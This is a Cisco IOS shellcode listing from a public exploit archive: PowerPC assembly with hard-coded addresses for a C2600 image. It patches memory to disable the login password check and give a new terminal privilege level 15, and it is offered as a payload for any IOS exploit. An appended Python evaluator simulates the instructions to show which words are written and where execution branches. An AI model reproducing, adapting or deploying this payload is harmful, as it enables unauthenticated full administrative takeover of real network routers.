# ----------------------------------------------------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8        # address branched to once both patches are applied
.equ login, 0x8359b1f4      # word zeroed by the login patch
.equ god, 0xff100000        # value stored by the priv patch
.equ priv, 0x8359be64       # word overwritten by the priv patch
# ----------------------------------------------------------------------------------------

main:

# login patch begin
lis 9, login@ha             # r9 = high half of login (adjusted for the signed low half)
la 9, login@l(9)            # r9 = login
li 8,0                      # r8 = 0
stw 8, 0(9)                 # *login = 0
# login patch end

# priv patch begin
lis 9, priv@ha              # r9 = priv (two-instruction 32-bit address load)
la 9, priv@l(9)
lis 8, god@ha               # r8 = god
la 8, god@l(8)
stw 8, 0(9)                 # *priv = god
# priv patch end

# exit code
lis 10, ret@ha              # r4 = ret
addi 4, 10, ret@l
mtctr 4                     # CTR = ret
bctrl                       # branch to ret

# milw0rm.com [2008-08-13]
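Added example (not part of the original payload): a minimal Python evaluator for the few PowerPC forms the listing uses, so a reviewer can confirm from the listing alone which words it stores, at which addresses, and where it branches. It applies the PowerPC ELF rule that sym@l is the sign-extended low 16 bits and sym@ha the high 16 bits incremented when the low half is negative, which is why (sym@ha << 16) + sym@l reproduces the full address; the symbol values are the four .equ constants above.

```python
# Added example (not part of the original payload): a minimal evaluator for the
# PowerPC forms used in the listing, so a reviewer can confirm which words the
# payload stores, at which addresses, and where it finally branches.
import re

SYMBOLS = {"ret": 0x804A42E8, "login": 0x8359B1F4, "god": 0xFF100000, "priv": 0x8359BE64}
LISTING = """lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl"""

def lo(addr):  # sym@l: low 16 bits as a signed value (addi/la sign-extend it)
    return (addr & 0xFFFF) - (0x10000 if addr & 0x8000 else 0)

def ha(addr):  # sym@ha: high 16 bits, plus one when the low half is negative
    return ((addr + 0x8000) >> 16) & 0xFFFF

def imm(tok):  # resolve 'sym@ha', 'sym@l' or a plain integer immediate
    m = re.fullmatch(r"(\w+)@(ha|l)", tok)
    return {"ha": ha, "l": lo}[m[2]](SYMBOLS[m[1]]) if m else int(tok, 0)

def ea(regs, tok):  # effective address of a 'd(rA)' operand
    d, ra = re.fullmatch(r"(\S+)\((\d+)\)", tok).groups()
    return (regs[int(ra)] + imm(d)) & 0xFFFFFFFF

def run(listing):
    """Return ({address: word written}, branch target) for the listing."""
    regs, stores, ctr = {}, {}, None
    for line in listing.splitlines():
        op, *a = line.replace(",", " ").split()
        if op in ("lis", "li"):      # rD = imm << 16  /  rD = imm
            regs[int(a[0])] = (imm(a[1]) << (16 if op == "lis" else 0)) & 0xFFFFFFFF
        elif op == "la":             # rD = rA + d
            regs[int(a[0])] = ea(regs, a[1])
        elif op == "addi":           # rD = rA + imm
            regs[int(a[0])] = (regs[int(a[1])] + imm(a[2])) & 0xFFFFFFFF
        elif op == "stw":            # mem[rA + d] = rS (one 32-bit word)
            stores[ea(regs, a[1])] = regs[int(a[0])]
        elif op == "mtctr":          # the final bctrl branches to CTR
            ctr = regs[int(a[0])]
    return stores, ctr
```

run(LISTING) reports exactly two stores, 0 at login and god at priv, and a branch target of ret, which is the whole effect of the payload for these addresses.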